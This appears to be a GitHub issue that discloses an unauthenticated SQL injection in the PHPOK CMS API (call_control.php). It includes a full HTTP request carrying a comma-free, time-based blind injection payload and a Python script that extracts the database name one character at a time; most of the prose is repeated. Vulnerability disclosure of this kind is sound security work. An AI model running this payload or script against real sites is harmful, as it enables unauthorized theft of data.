You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
There is a SQL injection in the function index_f() in phpok64/framework/api/call_control.php. This function calls the phpok() function, in which a dynamic call exists.
The function index_f() receives parameters in JSON format and can control the function that is called dynamically. Although names of callable functions are stored in the database, the _arclist function in them is vulnerable.
In this way, we can use the _arclist function to call the _arc_condition function, and there are a lot of conditional splicing of SQL statement in it.
In fact, there are a lot of guards set up in this function and even in this CMS. ',<, and > will be escaped and the input will be filtered. However, we can manage to bypass some of them, resulting in a serious SQL injection vulnerability. Besides, no login behavior or privileges are required to trigger this vulnerability.
In this code fragment, the CMS will split our input with a comma as a separator, and then concatenate each fragment into the SQL statement. This means we cannot have commas in our payload. Therefore, I made it with the following payload.
POST /api.php?c=call&f=index HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/Sec-Fetch-Dest: scriptSec-Fetch-Mode: no-corsSec-Fetch-Site: same-originConnection: closeCookie: PHPSESSION=bd34va2vksdhvqr8t1sll4lva7; XDEBUG_SESSION=PHPSTORMContent-Type: application/x-www-form-urlencodedContent-Length: 138data={"m_picplayer":{"_alias":"abc","fields_need":"CASE 1 WHEN (substr((select database()) from 1 for 1)=0x70) THEN sleep(5) ELSE 1 END"}}
Below are the results.
As we can see, when the condition is true that the database name starts with 0x70 (i.e. the letter p), a delay of 5 seconds is generated. Otherwise, nothing happens.
Then we can write a python script to test the effect.
importrandomimportrequestsimporttimeurl="http://127.0.0.1/api.php?c=call&f=index"result_str=""foriinrange(1, 30):
time.sleep(1.0)
print(i)
forjinrange(32, 127):
payload1="{\"m_picplayer\":{\"_alias\":\"abc\",\"fields_need\":\"CASE 1 WHEN (substr((select database()) from %d for 1)="%i+hex(j) +") THEN sleep(4) ELSE 1 END"+"\"}}"time.sleep(0.15)
data= {
'data': payload1
}
time1=time.time()
res=requests.post(url, data=data)#, proxies=proxies)time2=time.time()
iftime2-time1>4:
result_str+=chr(j)
print(result_str)
break
One thing to note is that each payload must be different, otherwise the cache mechanism will be triggered, and the database query will not be performed.
The text was updated successfully, but these errors were encountered:
There is a SQL injection in the function
index_f()
in phpok64/framework/api/call_control.php. This function calls thephpok()
function, in which a dynamic call exists.The function
index_f()
receives parameters in JSON format and can control the function that is called dynamically. Although names of callable functions are stored in the database, the_arclist
function in them is vulnerable.In this way, we can use the
_arclist
function to call the_arc_condition
function, and there are a lot of conditional splicing of SQL statement in it.In fact, there are a lot of guards set up in this function and even in this CMS. ',<, and > will be escaped and the input will be filtered. However, we can manage to bypass some of them, resulting in a serious SQL injection vulnerability. Besides, no login behavior or privileges are required to trigger this vulnerability.
In this code fragment, the CMS will split our input with a comma as a separator, and then concatenate each fragment into the SQL statement. This means we cannot have commas in our payload. Therefore, I made it with the following payload.
Below are the results.
As we can see, when the condition is true that the database name starts with 0x70 (i.e. the letter p), a delay of 5 seconds is generated. Otherwise, nothing happens.
Then we can write a python script to test the effect.
One thing to note is that each payload must be different, otherwise the cache mechanism will be triggered, and the database query will not be performed.
The text was updated successfully, but these errors were encountered: